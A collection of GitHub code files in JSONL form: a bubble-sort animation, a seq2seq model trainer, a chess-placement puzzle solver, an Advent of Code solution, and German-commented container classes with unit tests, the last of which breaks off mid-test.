+{"seq_id":"10440287869","text":"from matplotlib import rc\nfrom matplotlib.pyplot import gca, figure, axis, close, Rectangle\nfrom matplotlib.animation import FuncAnimation\nfrom numpy import array\n\nrc('animation', html='jshtml')\n\n\nclass TriBulles:\n def __init__(self, tab):\n N = len(tab)\n self.tab = tab.copy()\n self.width = 10\n\n self.fig = figure(figsize=(len(self.tab), 3))\n axis('off')\n axis('equal')\n axis([0, len(self.tab) * self.width, 0, self.width])\n\n self.rectangles = [gca().add_patch(Rectangle(array([i*self.width, 0]), self.width-1, self.width-1, fc='b'))\n for i in range(N)]\n self.annotations = [gca().annotate(self.tab[i], array([i*self.width, 0])+array([(self.width-1)*.5, (self.width-1)*.5]), color='w',\n weight='bold', fontsize=20,\n ha='center',\n va='center') for i in range(N)]\n self.indices = [n for n in range(N)]\n\n def move_vertical(self, i, j):\n for _ in range(self.width):\n self.rectangles[i].set_xy(\n array(self.rectangles[i].get_xy())-array([0, 1]))\n self.annotations[i].set_position(\n array(self.annotations[i].get_position())-array([0, 1]))\n self.rectangles[j].set_xy(\n array(self.rectangles[j].get_xy())+array([0, 1]))\n self.annotations[j].set_position(\n array(self.annotations[j].get_position())+array([0, 1]))\n yield\n\n def move_horizontal(self, i, j):\n for _ in range(self.width):\n self.rectangles[i].set_xy(\n array(self.rectangles[i].get_xy())+array([1, 0]))\n self.annotations[i].set_position(\n array(self.annotations[i].get_position())+array([1, 0]))\n self.rectangles[j].set_xy(\n array(self.rectangles[j].get_xy())-array([1, 0]))\n self.annotations[j].set_position(\n array(self.annotations[j].get_position())-array([1, 0]))\n yield\n\n def set_color(self, i, j, color):\n self.rectangles[i].set_color(color)\n self.rectangles[j].set_color(color)\n yield\n\n def freeze_color(self, i, color):\n self.rectangles[i].set_color(color)\n yield\n\n def tri(self):\n n = len(self.tab)\n yield\n for i in reversed(range(n)):\n for j in range(i):\n if self.tab[j+1] < self.tab[j]:\n yield from self.set_color(self.indices[j], self.indices[j+1], 'r')\n yield from self.move_vertical(self.indices[j], self.indices[j+1])\n yield from self.move_horizontal(self.indices[j], self.indices[j+1])\n yield from self.move_vertical(self.indices[j+1], self.indices[j])\n yield from self.set_color(self.indices[j], self.indices[j+1], 'b')\n self.tab[j], self.tab[j+1] = self.tab[j+1], self.tab[j]\n self.indices[j], self.indices[j +\n 1] = self.indices[j+1], self.indices[j]\n else:\n yield from self.set_color(self.indices[j], self.indices[j+1], 'y')\n for _ in range(self.width):\n yield\n yield from self.set_color(self.indices[j], self.indices[j+1], 'b')\n yield from self.freeze_color(self.indices[i], 'g')\n for _ in range(self.width):\n yield\n\n def animate(self, i):\n pass\n\n def get_animation(self):\n N = len(self.tab)\n ani = FuncAnimation(self.fig, self.animate, frames=self.tri,\n save_count=N*(N-1)//2*self.width*5)\n close()\n return ani\n","repo_name":"lgarcin/CoursInformatique","sub_path":"_scripts/tri_bulles.py","file_name":"tri_bulles.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"42648408378","text":"import torch\nimport torch.nn.functional as F\nimport numpy as np\nimport os\n\nfrom torch.utils.tensorboard import SummaryWriter\nfrom transformers import Adafactor, AdamW, get_linear_schedule_with_warmup, AutoModelForSeq2SeqLM\nfrom tqdm import tqdm\n\nfrom utils import trim_batch, label_smoothed_nll_loss\n\nclass Trainer(object):\n def __init__(self, config, logger, local_rank=-1):\n self.config = config\n self.logger = logger\n self.pad_token_id = None\n self.local_rank = local_rank\n\n def load_model(self, path=None):\n if path is not None:\n model = AutoModelForSeq2SeqLM.from_pretrained(self.config.model, state_dict=torch.load(path))\n else:\n model = AutoModelForSeq2SeqLM.from_pretrained(self.config.model)\n\n if self.config.do_train and (self.config.model == \"bigscience/T0_3B\" or self.config.model == \"google/t5-xl-lm-adapt\"):\n model.gradient_checkpointing_enable()\n if self.config.do_train and self.config.gradient_checkpointing:\n model.gradient_checkpointing_enable()\n \n return model\n\n def save(self, model, postfix):\n if self.local_rank <= 0:\n model_state_dict = {\n key: value.cpu() \n for key, value in model.state_dict().items()\n }\n torch.save(model_state_dict, os.path.join(self.config.out_dir, \"model-{}.pt\".format(postfix)))\n self.logger.info(\"Saving model with postfix {}\".format(postfix))\n\n def setup_optimizer(self, model):\n config = self.config\n no_decay = ['bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)], 'weight_decay': config.weight_decay},\n {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n if self.config.optimizer == \"adamw\":\n\n optimizer = AdamW(optimizer_grouped_parameters, lr=config.lr, eps=1e-8)\n scheduler = get_linear_schedule_with_warmup(optimizer,\n num_warmup_steps=config.warmup_steps,\n num_training_steps=config.num_training_steps)\n elif self.config.optimizer == \"adafactor\":\n optimizer = Adafactor(optimizer_grouped_parameters,\n lr=config.lr,\n relative_step=False,\n clip_threshold=config.max_grad_norm,\n warmup_init=False)\n scheduler = None\n return optimizer, scheduler\n\n def log(self, tb, log_dict, step):\n for key, value in log_dict.items():\n tb.add_scalar(key, value, step)\n\n def print_tensor(self, input_tensor, output_tensor):\n # print the examples in a tensor\n for i, (in_ids, out_ids) in enumerate(zip(input_tensor.cpu().tolist(), output_tensor.cpu().tolist())):\n input_text = self.tokenizer.decode(in_ids)\n output_text = self.tokenizer.decode(out_ids)\n self.logger.info(\"Example {}\".format(i))\n self.logger.info(\"Input: {}\".format(input_text))\n self.logger.info(\"Output: {}\".format(output_text))\n\n def do_train(self, model, data, dev_data=None):\n self.tokenizer = data.tokenizer # will be used by some functions (e.g., `print_batch` in FiDTrainer)\n\n if self.config.use_tensorboard:\n tb_writer = SummaryWriter(log_dir=self.config.out_dir)\n\n if torch.cuda.is_available():\n model.to(torch.device(\"cuda\"))\n\n model.train()\n\n optimizer, scheduler = self.setup_optimizer(model)\n\n global_step = 0\n global_batch = 0\n train_losses = []\n grad_norms = []\n best_perf = -1\n stop_training = False\n\n pbar = tqdm(total=self.config.num_training_steps)\n for epoch in range(1000000):\n pbar.set_description(\"Epoch {}\".format(epoch))\n for batch in data.dataloader:\n global_batch += 1\n\n # truncate the redundant padding 
tokens\n # batch = self.trim_batch(batch, pad_token_id=data.tokenizer.pad_token_id)\n loss = self.run_model(model, batch)\n\n if torch.isnan(loss).data:\n self.logger.info(\"Stop training because loss=%s\" % (loss.data))\n stop_training = True\n break\n\n train_losses.append(loss.detach().cpu())\n loss.backward()\n\n if global_batch % self.config.gradient_accumulation_steps == 0:\n global_step += 1\n pbar.update(1)\n\n if self.config.max_grad_norm is not None and self.config.optimizer != \"adafactor\":\n gn = torch.nn.utils.clip_grad_norm_(model.parameters(), self.config.max_grad_norm)\n grad_norms.append(gn.detach().cpu())\n\n optimizer.step()\n if scheduler is not None:\n scheduler.step()\n model.zero_grad()\n\n if self.config.do_valid and global_step % self.config.valid_period == 0:\n assert dev_data is not None\n metric, perf = self.do_eval(model, dev_data)\n\n self.logger.info(\"Validation at step {}: {}={}\".format(global_step, metric, perf))\n \n if self.config.use_tensorboard:\n log_dict = {\"dev_performance\": perf}\n self.log(tb_writer, log_dict, global_step)\n \n if perf > best_perf:\n self.logger.info(\"Saving the best model so far ({}: {} --> {})\".format(metric, best_perf, perf))\n self.save(model, \"best\")\n best_perf = perf\n\n model.train() # do_eval switches the model to eval mode; here we switch back\n \n if self.config.use_tensorboard and global_step % self.config.log_period == 0:\n log_dict = {\"loss\": np.mean(train_losses)}\n train_losses = []\n if len(grad_norms) > 0:\n log_dict[\"grad_norm\"] = np.mean(grad_norms)\n grad_norms = []\n self.log(tb_writer, log_dict, global_step)\n\n if self.config.save and global_step % self.config.save_period == 0:\n self.save(model, str(global_step))\n\n if global_step==self.config.num_training_steps or stop_training:\n break\n\n if global_step==self.config.num_training_steps or stop_training:\n break\n\n pbar.close()\n self.logger.info(\"Finish training\")\n \n if self.config.save:\n self.save(model, \"last\")\n\n return best_perf\n\n def do_eval(self, model, data):\n model.eval()\n if torch.cuda.is_available():\n model.to(torch.device(\"cuda\"))\n\n assert self.config.eval_mode in [\"rank_classification\", \"generation\"]\n\n if self.config.eval_mode == \"rank_classification\":\n predictions = self.do_eval_rank_classification(model, data)\n # from collections import Counter\n # counter = Counter(predictions)\n # print(counter)\n elif self.config.eval_mode == \"generation\":\n predictions = self.do_eval_generation(model, data)\n \n perf = data.evaluate(predictions)\n self.logger.info(\"Evaluation results: {}\".format(perf))\n return perf\n\n def do_eval_rank_classification(self, model, data):\n losses = []\n for batch in tqdm(data.dataloader, desc=\"Eval (Rank)\"):\n with torch.no_grad():\n # self.logger.info(batch[0])\n # self.print_tensor(batch[0], batch[2])\n # breakpoint()\n loss = self.run_model(model, batch, is_training=False)\n losses += loss.cpu().detach().numpy().tolist()\n losses = np.array(losses)\n\n predictions = []\n for idx, dp in enumerate(data.metadata):\n curr_instance_losses = [losses[indices] for indices in dp[\"indices\"]]\n prediction_idx = sorted(enumerate(curr_instance_losses), key=lambda x: x[1])[0][0]\n prediction = dp[\"options\"][prediction_idx]\n predictions.append(prediction.strip())\n\n return predictions\n\n def do_eval_generation(self, model, data):\n pad_token_id = data.tokenizer.pad_token_id\n predictions = []\n for batch in tqdm(data.dataloader, desc=\"Eval (Generation)\"):\n with 
torch.no_grad():\n if torch.cuda.is_available():\n batch = [b.to(torch.device(\"cuda\")) for b in batch]\n batch = self.trim_batch(batch, pad_token_id=data.tokenizer.pad_token_id)\n outputs = model.generate(input_ids=batch[0],\n attention_mask=batch[1],\n num_beams=4,\n max_length=64,\n early_stopping=True,\n use_cache=True)\n predictions += data.decode_batch(outputs)\n\n return predictions\n\n def trim_batch(self, batch, pad_token_id):\n batch[0], batch[1] = trim_batch(batch[0], pad_token_id, batch[1])\n if len(batch) == 4:\n batch[2], batch[3] = trim_batch(batch[2], pad_token_id, batch[3])\n return batch \n\n def run_model(self, model, batch, is_training=True):\n if torch.cuda.is_available():\n batch = [b.to(torch.device(\"cuda\")) for b in batch]\n\n batch = self.trim_batch(batch, self.pad_token_id)\n input_ids, attention_mask = batch[0], batch[1]\n decoder_input_ids, decoder_attention_mask = batch[2], batch[3]\n\n\n if is_training and self.config.train_with_generation_loss:\n decoder_input_ids [decoder_input_ids == self.pad_token_id] = -100\n\n output = model(\n input_ids=input_ids,\n attention_mask=attention_mask,\n labels=decoder_input_ids,\n decoder_attention_mask=decoder_attention_mask,\n use_cache=False\n )\n\n if is_training and self.config.train_with_generation_loss:\n return output.loss\n\n # rank_classification\n lprobs = F.log_softmax(output.logits, dim=-1)\n loss, _ = label_smoothed_nll_loss(\n lprobs, decoder_input_ids, \n epsilon=0.0, \n # epsilon=0.1 if is_training else 0.0, \n ignore_index=model.config.pad_token_id,\n average=self.config.loss_avg_mode, # by default it's per-instance token-avg loss\n )\n\n if is_training:\n return loss.mean()\n else:\n return loss\n\n","repo_name":"INK-USC/FiD-ICL","sub_path":"encdec/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"90"}
+{"seq_id":"19820885386","text":"import sys\n\nif (len(sys.argv) != 2):\n\tprint(\"Usage: sat-solver.py N\")\n\tquit()\n\n\n# N represents the board size\nN = int(sys.argv[1])\n\n# Represents a piece, with the type (queen, rook, bishop, or knight)\n# as well as the x and y position on the board\nclass piece:\n\tdef __init__(self, type, x, y):\n\t\tself.type = type\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef __str__(self):\n\t\treturn (\"\" + type + x + y)\n\n# Checks if a given x, y location contains a piece or not\ndef haspiece(board, x, y):\n\tfor p in board:\n\t\tif (p.x == x and p.y == y):\n\t\t\treturn (\" \" + p.type + \" \")\n\treturn \" \"\n\n# Prints a chessboard in a visually accurate manner\ndef printchessboard(board):\n\tfor x in range(N):\n\t\tfor y in range(N):\n\t\t\tprint(haspiece(board, x, y), end = '')\n\t\tprint(\"\")\n\n# Compares 2 boards. If they are the same, returns True.\n# Returns false if they are not the same\ndef compareboards(b1, b2):\n\tif (len(b1) == len(b2)):\n\t\tsame = True\n\t\tfor p1 in b1:\n\t\t\toneofthose = False\n\t\t\tfor p2 in b2:\n\t\t\t\tif (p1.x == p2.x and p1.y == p2.y):\n\t\t\t\t\toneofthose = True\n\t\t\tsame = same and oneofthose\n\t\treturn same\n\telse :\n\t\treturn False\n\n# Checks to see if a list of baords contains an instance of another board\n# Returns True if it does contain that board, false otherwise\ndef boardscontains(board, listofb):\n\tfor b in listofb:\n\t\tif (compareboards(b, board)):\n\t\t\treturn True\n\treturn False\n\n\n\n# Returns false if it intersects with another piece, \n# return true if it is clear to place a piece down\ndef check_linear(placed_piece, board):\n\tif (not board):\n\t\treturn True\n\tfor p in board:\n\t\tif (p.x == placed_piece.x or p.y == placed_piece.y):\n\t\t\treturn False\n\n\treturn True\n\n\n# Returns false if it intersects with another piece, \n# return true if it is clear to place a piece down\ndef check_diagonal(placed_piece, board):\n\tfor p in board:\n\t\tif (abs(placed_piece.x - p.x) == abs(placed_piece.y - p.y)):\n\t\t\treturn False\n\treturn True\n\n\n# given a piece and board, return true if the square is not being attacked by a knight\n# returns false otherwise\ndef check_knight(piece, board):\n\tfor p in board:\n\t\tif ((p.x == piece.x - 2 and p.y == piece.y - 1) \n\t\t\tor (p.x == piece.x - 2 and p.y == piece.y + 1)\n\t\t\tor (p.x == piece.x + 2 and p.y == piece.y - 1)\n\t\t\tor (p.x == piece.x + 2 and p.y == piece.y + 1)\n\t\t\tor (p.x == piece.x - 1 and p.y == piece.y - 2)\n\t\t\tor (p.x == piece.x - 1 and p.y == piece.y + 2)\n\t\t\tor (p.x == piece.x + 1 and p.y == piece.y - 2)\n\t\t\tor (p.x == piece.x + 1 and p.y == piece.y + 2)):\n\t\t\treturn False\n\t\n\treturn True\n\n\n\ndef make_queen_boards(currentboard, y):\n\tglobal queen_boards\n\tglobal N\n\n\tif (y == N):\n\t\treturn\n\n\tfor x in range(N):\n\t\tif (check_linear(piece(\"Q\", x, y), currentboard)\n\t\t\tand check_diagonal(piece(\"Q\", x, y), currentboard)):\n\n\t\t\tcurrentboard.append(piece(\"Q\", x, y))\n\n\t\t\tif (len(currentboard) == N):\n\t\t\t\tqueen_boards.append(currentboard.copy())\n\n\t\t\tmake_queen_boards(currentboard, y + 1)\n\t\t\tcurrentboard.pop()\n\n\n# Generates all possibilities for boards with N rooks following the rules\n# of the chess puzzle\ndef make_rook_boards(currentboard, y):\n\tglobal rook_boards\n\tglobal N\n\n\tif (y == N):\n\t\treturn\n\n\tfor x in range(N):\n\t\tif (check_linear(piece(\"R\", x, y), currentboard)):\n\t\t\tcurrentboard.append(piece(\"R\", x, y))\n\n\t\t\tif 
(len(currentboard) == N):\n\t\t\t\trook_boards.append(currentboard.copy())\n\n\t\t\tmake_rook_boards(currentboard, y + 1)\n\t\t\tcurrentboard.pop()\n\n\n# Generates all possibilities for boards with bishops following the rules\n# of the chess puzzle\ndef make_bish_boards():\n\tfor x in range (N):\n\t\tfor y in range(N):\n\t\t\tmake_bish_boards_r([piece(\"B\", x, y)], 0)\n\n# Recursive function for generating bishop boards\ndef make_bish_boards_r(currentboard, y):\n\tglobal bish_boards\n\tglobal N\n\n\tif (y == N):\n\t\treturn\n\n\tfor x in range(N):\n\n\n\t\tif (check_diagonal(piece(\"B\", x, y), currentboard)):\n\n\n\t\t\tcurrentboard.append(piece(\"B\", x, y))\n\n\t\t\tif (len(currentboard) == ((2 * N) - 2)):\n\t\t\t\tif(not boardscontains(currentboard, bish_boards)):\n\t\t\t\t\tbish_boards.append(currentboard.copy())\n\n\t\t\tif (x == N - 1):\n\t\t\t\tmake_bish_boards_r(currentboard, y + 1)\n\t\t\telse:\n\t\t\t\tmake_bish_boards_r(currentboard, y)\n\t\t\tcurrentboard.pop()\n\t\telse:\n\t\t\tif (x == N - 1):\n\t\t\t\tmake_bish_boards_r(currentboard, y + 1)\n\n\nmaxlen = 0\ndef make_knight_boards(combinedboards):\n\tfor b in combinedboards:\n\t\tfor x in range (N):\n\t\t\tfor y in range(N):\n\t\t\t\tmake_knight_boards_r([piece(\"K\", x, y)], 0, 0, b)\n\ndef make_knight_boards_r(currentboard, y, startx, b):\n\tglobal knight_boards\n\tglobal N\n\tglobal maxlen\n\tglobal solved\n\n\tif (y == N):\n\t\treturn\n\n\tfor x in range(startx, N):\n\n\t\tif (check_knight(piece(\"K\", x, y), currentboard) and (haspiece(b, x, y) == \" \")):\n\n\t\t\tcurrentboard.append(piece(\"K\", x, y))\n\t\t\t\n\t\t\tif (len(currentboard) > maxlen):\n\t\t\t\tmaxlen = len(currentboard)\n\t\t\t\tknight_boards = []\n\t\t\t\tknight_boards.append(currentboard.copy())\n\t\t\t\tsolved = []\n\t\t\t\tcombd = comboard(b, currentboard.copy())\n\t\t\t\tif (not combd == []):\n\t\t\t\t\tsolved.append(combd.copy())\n\n\t\t\telif (len(currentboard) == maxlen):\n\t\t\t\tif(not boardscontains(currentboard, knight_boards)):\n\t\t\t\t\tknight_boards.append(currentboard.copy())\n\t\t\t\t\tcombd = comboard(b, currentboard.copy())\n\t\t\t\t\tif (not combd == []):\n\t\t\t\t\t\tsolved.append(combd.copy())\n\n\t\t\tif (x == N - 1):\n\t\t\t\tmake_knight_boards_r(currentboard, y + 1, 0, b)\n\t\t\telse:\n\t\t\t\tmake_knight_boards_r(currentboard, y, x + 1, b)\n\t\t\tcurrentboard.pop()\n\t\telse:\n\t\t\tif (x == N - 1):\n\t\t\t\tmake_knight_boards_r(currentboard, y + 1, 0, b)\n\n\n\n# prints \ndef printboard(board):\n\tfor p in board:\n\t\tprint(#\"Piece, x, y\", \n\t\t\tp.type, p.x, p.y)\n\treturn\n\n# Combines two boards with no overlap in pieces. 
If there is any overlap,\n# it returns an empty list.\ndef comboard(board1, board2):\n\tnewboard = []\n\tfor p1 in board1:\n\t\tfor p2 in board2:\n\t\t\tif (p1.x == p2.x and p1.y == p2.y):\n\t\t\t\treturn []\n\n\tnewboard.extend(board1.copy())\n\tnewboard.extend(board2.copy())\n\n\t#printboard(newboard)\n\n\treturn newboard\n\n# Given 3 lists of boards, it returns all given combinations of the 3 types of boards.\ndef combineboards(queen_boards, rook_boards, bish_boards):\n\tcombinedall = []\n\tcombinedqr = []\n\tfor q in queen_boards:\n\t\tfor r in rook_boards:\n\t\t\tcombined = comboard(q, r)\n\t\t\tif (combined == []):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcombinedqr.append(combined)\n\t\t\t\t#print(\"- \" * 20)\n\t\t\t\t#printboard(combined)\n\n\t\n\t\n\tfor c in combinedqr:\n\t\tfor b in bish_boards:\n\t\t\tcombined = comboard(c, b)\n\t\t\tif (combined == []):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcombinedall.append(combined)\n\n\treturn combinedall\n\n\n\n\nrook_boards = []\nmake_rook_boards([], 0)\n\nbish_boards = []\nmake_bish_boards()\n\nqueen_boards = []\nmake_queen_boards([], 0)\n\n\ncombined = combineboards(queen_boards, rook_boards, bish_boards)\n\nsolved = []\n\nknight_boards = []\nmake_knight_boards(combined)\n\n\n\n\n\n\n\nfor b in solved:\n\tprint('- ' * 20)\n\tprintchessboard(b)\n\tprint('- ' * 20)\nprint(\"numsolutions = \", len(solved))\nprint(\"length = \", len(solved[0]) - 1)\n\n#print(len(combined))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"draketmoore/crowded-chessboard-solver","sub_path":"nonsatsolver.py","file_name":"nonsatsolver.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
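The eight explicit disjuncts in check_knight above can be collapsed into an offset table, which is easier to audit against the knight's move set. A behavior-preserving alternative sketch (a refactoring suggestion, not code from the repo):

KNIGHT_OFFSETS = [(-2, -1), (-2, 1), (2, -1), (2, 1),
                  (-1, -2), (-1, 2), (1, -2), (1, 2)]

def check_knight_compact(piece, board):
    # True when no piece on the board sits a knight's move away from `piece`.
    occupied = {(p.x, p.y) for p in board}
    return not any((piece.x + dx, piece.y + dy) in occupied
                   for dx, dy in KNIGHT_OFFSETS)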
+{"seq_id":"10571341977","text":"import re\nfrom day4_1 import _get_input\n\n\ndef find_overlaps():\n assignments = _get_input()\n total = 0\n \n for pair in assignments:\n a, b, c, d = list(map(int, re.findall('(\\d+)', pair)))\n \n if (c <= b <= d) or (c <= a <=d) \\\n or (a <= c <= b) or (a <= d <=b):\n total += 1\n else:\n print(a,b,c,d)\n\n return total\n\nprint(find_overlaps())","repo_name":"urszkam/AoC_2022","sub_path":"python/day4/day4_2.py","file_name":"day4_2.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"19938137179","text":"import unittest, random, copy\r\nimport timeit\r\nimport ringbuffer\r\n\r\n# Variante 1:\r\n# push durch Vergrößern um ein Element\r\n# popFirst durch Verschieben nach vorne\r\nclass UniversalContainer1:\r\n def __init__(self):\r\n self.capacity_ = 1\r\n self.data_ = [None]*self.capacity_\r\n self.size_ = 0\r\n\r\n def size(self):\r\n return self.size_\r\n\r\n def capacity(self):\r\n return self.capacity_\r\n\r\n def push(self, item):\r\n if self.capacity_ == self.size_:\r\n self.capacity_ += 1 # Kapazität wird um eins vergrößert…\r\n self.data += [None] # …und in data reflektiert\r\n self.data_[self.size_] = item\r\n self.size_ += 1\r\n\r\n def popFirst(self):\r\n if self.size_ == 0:\r\n raise RuntimeError(\"popFirst() on empty container\")\r\n self.size_ -= 1\r\n for i in range(self.size_):\r\n self.data_[i] = self.data_[i+1]\r\n\r\n def popLast(self):\r\n if self.size_ == 0:\r\n raise RuntimeError(\"popLast() on empty container\")\r\n self.size_ -= 1\r\n\r\n def __getitem__(self, index): # __getitem__ implementiert v = c[index]\r\n if index < 0 or index >= self.size_:\r\n raise RuntimeError(\"index out of range\")\r\n return self.data_[index]\r\n\r\n def __setitem__(self, index, v): # __setitem__ implementiert c[index] = v\r\n if index < 0 or index >= self.size_:\r\n raise RuntimeError(\"index out of range\")\r\n self.data_[index] = v\r\n\r\n def first(self):\r\n return self.__getitem__(0)\r\n\r\n def last(self):\r\n return self.__getitem__(self.size_ - 1)\r\n\r\n# Variante 2\r\n# push durch Verdoppeln\r\n# popFirst durch Verschieben nach vorne\r\nclass UniversalContainer2:\r\n def __init__(self):\r\n self.capacity_ = 1\r\n self.data_ = [None]*self.capacity_\r\n self.size_ = 0\r\n\r\n def size(self):\r\n return self.size_\r\n\r\n def capacity(self):\r\n return self.capacity_\r\n\r\n def push(self, item):\r\n if self.capacity_ == self.size_:\r\n self.capacity_ *= 2 # Kapazität verdoppeln…\r\n self.data_ += [None]*self.size_ # …und in self.data reflektieren\r\n self.data_[self.size_] = item\r\n self.size_ += 1\r\n\r\n def popFirst(self):\r\n if self.size_ == 0:\r\n raise RuntimeError(\"popFirst() on empty container\")\r\n self.size_ -= 1\r\n for i in range(self.size_):\r\n self.data_[i] = self.data_[i+1]\r\n\r\n def popLast(self):\r\n if self.size_ == 0:\r\n raise RuntimeError(\"popLast() on empty container\")\r\n self.size_ -= 1\r\n\r\n def __getitem__(self, index):\r\n if index < 0 or index >= self.size_:\r\n raise RuntimeError(\"index out of range\")\r\n return self.data_[index]\r\n\r\n def __setitem__(self, index, v):\r\n if index < 0 or index >= self.size_:\r\n raise RuntimeError(\"index out of range\")\r\n self.data_[index] = v\r\n\r\n def first(self):\r\n return self.__getitem__(0)\r\n\r\n def last(self):\r\n return self.__getitem__(self.size_ - 1)\r\n\r\n# Variante 3:\r\n# push durch Verdoppeln der Kapazität\r\n# popFirst als ringbuffer\r\nclass UniversalContainer3:\r\n def __init__(self):\r\n self.capacity_ = 1\r\n\r\n # Idee:\r\n # * wenn first_ == last_: container ist leer\r\n # * wenn first_ == (last_ + 1) % len(data_): container ist voll\r\n # Wir brauchen also immer ein Element mehr als Kapazität, damit wir auf\r\n # dieses zeigen können falls voll ist.\r\n self.data_ = [None]*(self.capacity_+1)\r\n self.first_ = self.last_ = 0\r\n\r\n def size(self): # Wir berechnen die Größe aus last_ und first_\r\n return (self.last_ - self.first_) % len(self.data_)\r\n\r\n def capacity(self):\r\n return self.capacity_\r\n\r\n def push(self, item): # add 
item at the end\r\n if self.capacity_ == self.size():\r\n self.capacity_ *= 2 # Kapazität verdoppeln…\r\n new_data = [None]*(self.capacity_ + 1) # …und im Speicher reflektieren\r\n\r\n # Daten kopieren. Hier kann nicht einfach nur angehängt werden, da\r\n # ggf. Dinge merkwürdig gespeichert sind und wir sie hier wieder\r\n # \"auf Anfang\" setzen wollen.\r\n for i in range(self.size()):\r\n new_data[i] = self.data_[(self.first_ + i) % len(self.data_)]\r\n # Aktualisieren der Grenzen. Wir müssen erst last_ ändern, weil\r\n # size() sonst einen falschen Wert zurückgibt.\r\n self.last_ = self.size()\r\n self.first_ = 0\r\n self.data_ = new_data\r\n self.data_[self.last_] = item\r\n self.last_ = (self.last_ + 1) % len(self.data_)\r\n\r\n def popFirst(self):\r\n if self.size() == 0:\r\n raise RuntimeError(\"popFirst() on empty container\")\r\n self.first_ = (self.first_ + 1) % len(self.data_)\r\n\r\n def popLast(self):\r\n if self.size() == 0:\r\n raise RuntimeError(\"popLast() on empty container\")\r\n self.last_ = (self.last_ - 1) % len(self.data_)\r\n\r\n def __getitem__(self, index):\r\n if index < 0 or index >= self.size():\r\n raise RuntimeError(\"index out of range\")\r\n return self.data_[(index + self.first_) % len(self.data_)]\r\n\r\n def __setitem__(self, index, v):\r\n if index < 0 or index >= self.size():\r\n raise RuntimeError(\"index out of range\")\r\n self.data_[(index + self.first_) % len(self.data_)] = v\r\n\r\n def first(self):\r\n if self.size() == 0:\r\n raise RuntimeError(\"first() on empty container\")\r\n return self.data_[self.first_]\r\n\r\n def last(self):\r\n if self.size() == 0:\r\n raise RuntimeError(\"last() on empty container\")\r\n return self.data_[(self.last_ - 1) % len(self.data_)]\r\n\r\n def __str__(self):\r\n res = '['\r\n for i in range(self.size()):\r\n if i > 0:\r\n res += ', '\r\n res += str(self[i])\r\n res +=']'\r\n return res\r\n\r\n\r\ndef containersEqual(left, right):\r\n if left.size() != right.size():\r\n return False\r\n for i in range(left.size()):\r\n if left[i] != right[i]:\r\n return False\r\n return True\r\n\r\nclass TestContainer(unittest.TestCase):\r\n def checkSimple(self, Type):\r\n # teste leeren Container\r\n c = Type()\r\n assert c.size() == 0\r\n assert c.size() <= c.capacity()\r\n\r\n # teste push() in leeren Container\r\n c.push(1)\r\n assert c.size() == 1\r\n assert c.size() <= c.capacity()\r\n assert c.first() == 1\r\n assert c.last() == 1\r\n assert c[0] == 1\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n\r\n # teste popLast() bei size==1\r\n c.popLast()\r\n assert c.size() == 0\r\n assert c.size() <= c.capacity()\r\n\r\n # teste push() von zwei Elementen, gefolgt von popLst()\r\n c.push(1)\r\n c_old = copy.deepcopy(c)\r\n c.push(2)\r\n assert c.size() == 2\r\n assert c.size() <= c.capacity()\r\n assert c.first() == 1\r\n assert c.last() == 2\r\n assert c[0] == 1\r\n assert c[1] == 2\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n c.popLast()\r\n assert containersEqual(c, c_old)\r\n\r\n # teste popFirst() bei zwei Elementen\r\n c.push(2)\r\n c.popFirst()\r\n assert c.size() == 1\r\n assert c.size() <= c.capacity()\r\n assert c.first() == 2\r\n assert c.last() == 2\r\n assert c[0] == 2\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n c.popFirst()\r\n assert c.size() == 0\r\n assert c.size() <= c.capacity()\r\n\r\n # teste c[k] = v bei vier Elementen\r\n c.push(2)\r\n c.push(3)\r\n c.push(4)\r\n c.push(5)\r\n for k in range(c.size()):\r\n c_old = copy.deepcopy(c)\r\n c[k] = k + 6\r\n 
for i in range(c.size()):\r\n if i != k:\r\n assert c[i] == c_old[i]\r\n else:\r\n assert c[i] == k + 6\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n\r\n # teste popFirst() bei vier Elementen\r\n c_old = copy.deepcopy(c)\r\n c.popFirst()\r\n assert c.size() == 3\r\n assert c.size() <= c.capacity()\r\n assert c.first() == 7\r\n assert c.last() == 9\r\n for i in range(c.size()):\r\n assert c[i] == c_old[i+1]\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n\r\n # teste popLast() bei drei Elementen\r\n c_old = copy.deepcopy(c)\r\n c.popLast()\r\n assert c.size() == 2\r\n assert c.size() <= c.capacity()\r\n assert c.first() == 7\r\n assert c.last() == 8\r\n for i in range(c.size()):\r\n assert c[i] == c_old[i]\r\n assert c[0] == c.first() and c[c.size()-1] == c.last()\r\n\r\n def testContainer1(self):\r\n self.checkSimple(UniversalContainer1)\r\n\r\n def testContainer2(self):\r\n self.checkSimple(UniversalContainer2)\r\n\r\n def testContainer3(self):\r\n self.checkSimple(UniversalContainer3)\r\n\r\n # Konstruktor und das Verhalten bei leerer UniversalContainer3 werden getestet\r\n def testConstructor(self):\r\n q = UniversalContainer3()\r\n self.assertEqual(q.capacity(), 1)\r\n self.assertEqual(q.size(), 0)\r\n self.assertRaises(RuntimeError, q.popFirst)\r\n self.assertRaises(RuntimeError, q.popLast)\r\n\r\n # push() wird getestet\r\n def testPush(self):\r\n for y in range(0,100):\r\n q = UniversalContainer3()\r\n\r\n for i in range(0, y):\r\n q.push(i)\r\n self.assertEqual(q.size(), i+1)\r\n self.assertTrue(q.size() <= 